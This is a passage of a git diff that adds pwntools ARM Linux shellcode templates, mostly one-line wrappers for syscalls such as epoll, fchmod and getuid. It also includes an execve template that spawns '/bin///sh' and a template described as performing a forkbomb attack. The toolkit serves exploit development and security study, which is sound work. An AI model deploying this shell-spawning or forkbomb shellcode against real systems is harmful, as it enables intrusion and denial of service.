+<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/echo.asm b/pwnlib/shellcraft/templates/arm/linux/echo.asm new file mode 100644 index 000000000..ce9f6add7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/echo.asm @@ -0,0 +1,14 @@ +<% from pwnlib.shellcraft import arm %> +<%page args="string, sock = '1'"/> +<%docstring> +Writes a string to a file descriptor + +Example: + + >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() + 'hello\n' + + + +${arm.pushstr(string, append_null = False)} +${arm.linux.syscall('SYS_write', sock, 'sp', len(string))} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_create.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_create.asm new file mode 100644 index 000000000..a89b0058b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_create1.asm new file mode 100644 index 000000000..72bb36257 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_ctl.asm new file mode 100644 index 000000000..ae7c01763 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_pwait.asm new file mode 100644 index 000000000..720697201 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_wait.asm new file mode 100644 index 000000000..ef0464b7b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/execve.asm b/pwnlib/shellcraft/templates/arm/linux/execve.asm new file mode 100644 index 000000000..384e001c7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/execve.asm @@ -0,0 +1,26 @@ +<% + from pwnlib.shellcraft import arm + from pwnlib.abi import linux_arm_syscall +%> +<%docstring> +Execute a different process. + +<%page args="path = '/bin///sh', argv=[], envp={}"/> +<% +if isinstance(envp, dict): + envp = ['%s=%s' % (k,v) for (k,v) in envp.items()] + +regs = linux_arm_syscall.register_arguments +%> +% if argv: + ${arm.pushstr_array(regs[2], argv)} +% else: + ${arm.mov(regs[2], 0)} +% endif +% if envp: + ${arm.pushstr_array(regs[3], envp)} +% else: + ${arm.mov(regs[3], 0)} +% endif + ${arm.pushstr(path)} + ${arm.syscall('SYS_execve', 'sp', regs[2], regs[3])} diff --git a/pwnlib/shellcraft/templates/arm/linux/exit.asm b/pwnlib/shellcraft/templates/arm/linux/exit.asm new file mode 100644 index 000000000..ee8cc74d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/exit.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall exit. See 'man 2 exit' for more information. + +Arguments: + status(int): status + + + ${syscall('SYS_exit', status)} diff --git a/pwnlib/shellcraft/templates/arm/linux/faccessat.asm b/pwnlib/shellcraft/templates/arm/linux/faccessat.asm new file mode 100644 index 000000000..b23178ab3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fallocate.asm b/pwnlib/shellcraft/templates/arm/linux/fallocate.asm new file mode 100644 index 000000000..f807f26e3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchdir.asm b/pwnlib/shellcraft/templates/arm/linux/fchdir.asm new file mode 100644 index 000000000..72091451b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchmod.asm b/pwnlib/shellcraft/templates/arm/linux/fchmod.asm new file mode 100644 index 000000000..c11d6b9ed --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchmodat.asm b/pwnlib/shellcraft/templates/arm/linux/fchmodat.asm new file mode 100644 index 000000000..4d6aac9d1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchown.asm b/pwnlib/shellcraft/templates/arm/linux/fchown.asm new file mode 100644 index 000000000..b10b775a7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchownat.asm b/pwnlib/shellcraft/templates/arm/linux/fchownat.asm new file mode 100644 index 000000000..b4cec961c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fcntl.asm b/pwnlib/shellcraft/templates/arm/linux/fcntl.asm new file mode 100644 index 000000000..ca4a45ece --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fdatasync.asm b/pwnlib/shellcraft/templates/arm/linux/fdatasync.asm new file mode 100644 index 000000000..a0773cdfc --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/arm/linux/flock.asm b/pwnlib/shellcraft/templates/arm/linux/flock.asm new file mode 100644 index 000000000..660503dd7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fork.asm b/pwnlib/shellcraft/templates/arm/linux/fork.asm new file mode 100644 index 000000000..2b44441b3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/arm/linux/forkbomb.asm b/pwnlib/shellcraft/templates/arm/linux/forkbomb.asm new file mode 100644 index 000000000..3fd9ea57f --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/forkbomb.asm @@ -0,0 +1,13 @@ +<% + from pwnlib.shellcraft.arm.linux import fork + from pwnlib.shellcraft.common import label +%> +<%docstring> +Performs a forkbomb attack. + +<% + dosloop = label('fork_bomb') +%> +${dosloop}: + ${fork()} + b ${dosloop} diff --git a/pwnlib/shellcraft/templates/arm/linux/forkexit.asm b/pwnlib/shellcraft/templates/arm/linux/forkexit.asm new file mode 100644 index 000000000..f2b4561ee --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/forkexit.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.arm.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + cmp r0, 1 + blt ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/arm/linux/fstat.asm b/pwnlib/shellcraft/templates/arm/linux/fstat.asm new file mode 100644 index 000000000..6d67bbc2d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fstat64.asm b/pwnlib/shellcraft/templates/arm/linux/fstat64.asm new file mode 100644 index 000000000..4f63f45e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fstatat64.asm b/pwnlib/shellcraft/templates/arm/linux/fstatat64.asm new file mode 100644 index 000000000..24007f399 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fsync.asm b/pwnlib/shellcraft/templates/arm/linux/fsync.asm new file mode 100644 index 000000000..bc044d318 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ftruncate.asm b/pwnlib/shellcraft/templates/arm/linux/ftruncate.asm new file mode 100644 index 000000000..888856e9e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/arm/linux/ftruncate64.asm new file mode 100644 index 000000000..1174f2c9c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/futimesat.asm b/pwnlib/shellcraft/templates/arm/linux/futimesat.asm new file mode 100644 index 000000000..97406fc8d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getcwd.asm b/pwnlib/shellcraft/templates/arm/linux/getcwd.asm new file mode 100644 index 000000000..f5a593791 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getdents.asm b/pwnlib/shellcraft/templates/arm/linux/getdents.asm new file mode 100644 index 000000000..6bd74d074 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getdents.asm @@ -0,0 +1,14 @@ +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, dirp, count"/> +<%docstring> +Invokes the syscall getdents. See 'man 2 getdents' for more information. + +Arguments: + fd(int): fd + dirp(int): dirp + count(int): count + + + ${syscall('SYS_getdents', fd, dirp, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getegid.asm b/pwnlib/shellcraft/templates/arm/linux/getegid.asm new file mode 100644 index 000000000..b492c9103 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/geteuid.asm b/pwnlib/shellcraft/templates/arm/linux/geteuid.asm new file mode 100644 index 000000000..1455d3d42 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getgid.asm b/pwnlib/shellcraft/templates/arm/linux/getgid.asm new file mode 100644 index 000000000..1e6214040 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getgroups.asm b/pwnlib/shellcraft/templates/arm/linux/getgroups.asm new file mode 100644 index 000000000..7b4394277 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getitimer.asm b/pwnlib/shellcraft/templates/arm/linux/getitimer.asm new file mode 100644 index 000000000..790d96be0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpeername.asm b/pwnlib/shellcraft/templates/arm/linux/getpeername.asm new file mode 100644 index 000000000..a8beb00c3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpgid.asm b/pwnlib/shellcraft/templates/arm/linux/getpgid.asm new file mode 100644 index 000000000..81a2484ce --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpgrp.asm b/pwnlib/shellcraft/templates/arm/linux/getpgrp.asm new file mode 100644 index 000000000..bb2788434 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpid.asm b/pwnlib/shellcraft/templates/arm/linux/getpid.asm new file mode 100644 index 000000000..4659d180f --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpmsg.asm b/pwnlib/shellcraft/templates/arm/linux/getpmsg.asm new file mode 100644 index 000000000..9a7ad27a4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getppid.asm b/pwnlib/shellcraft/templates/arm/linux/getppid.asm new file mode 100644 index 000000000..9df7d8e08 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpriority.asm b/pwnlib/shellcraft/templates/arm/linux/getpriority.asm new file mode 100644 index 000000000..d12951854 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getresgid.asm b/pwnlib/shellcraft/templates/arm/linux/getresgid.asm new file mode 100644 index 000000000..57ebc84ec --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getresuid.asm b/pwnlib/shellcraft/templates/arm/linux/getresuid.asm new file mode 100644 index 000000000..dc898afbe --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getrlimit.asm b/pwnlib/shellcraft/templates/arm/linux/getrlimit.asm new file mode 100644 index 000000000..39f400d09 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getrusage.asm b/pwnlib/shellcraft/templates/arm/linux/getrusage.asm new file mode 100644 index 000000000..776fc95b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getsid.asm b/pwnlib/shellcraft/templates/arm/linux/getsid.asm new file mode 100644 index 000000000..27287816b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getsockname.asm b/pwnlib/shellcraft/templates/arm/linux/getsockname.asm new file mode 100644 index 000000000..fda3e1de3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getsockopt.asm b/pwnlib/shellcraft/templates/arm/linux/getsockopt.asm new file mode 100644 index 000000000..0498b6ffc --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/arm/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/arm/linux/gettimeofday.asm new file mode 100644 index 000000000..486aebce0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getuid.asm b/pwnlib/shellcraft/templates/arm/linux/getuid.asm new file mode 100644 index 000000000..02b9e9de1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/gtty.asm b/pwnlib/shellcraft/templates/arm/linux/gtty.asm new file mode 100644 index 000000000..962038b9d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ioctl.asm b/pwnlib/shellcraft/templates/arm/linux/ioctl.asm new file mode 100644 index 000000000..cf6e4ffc7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ioperm.asm 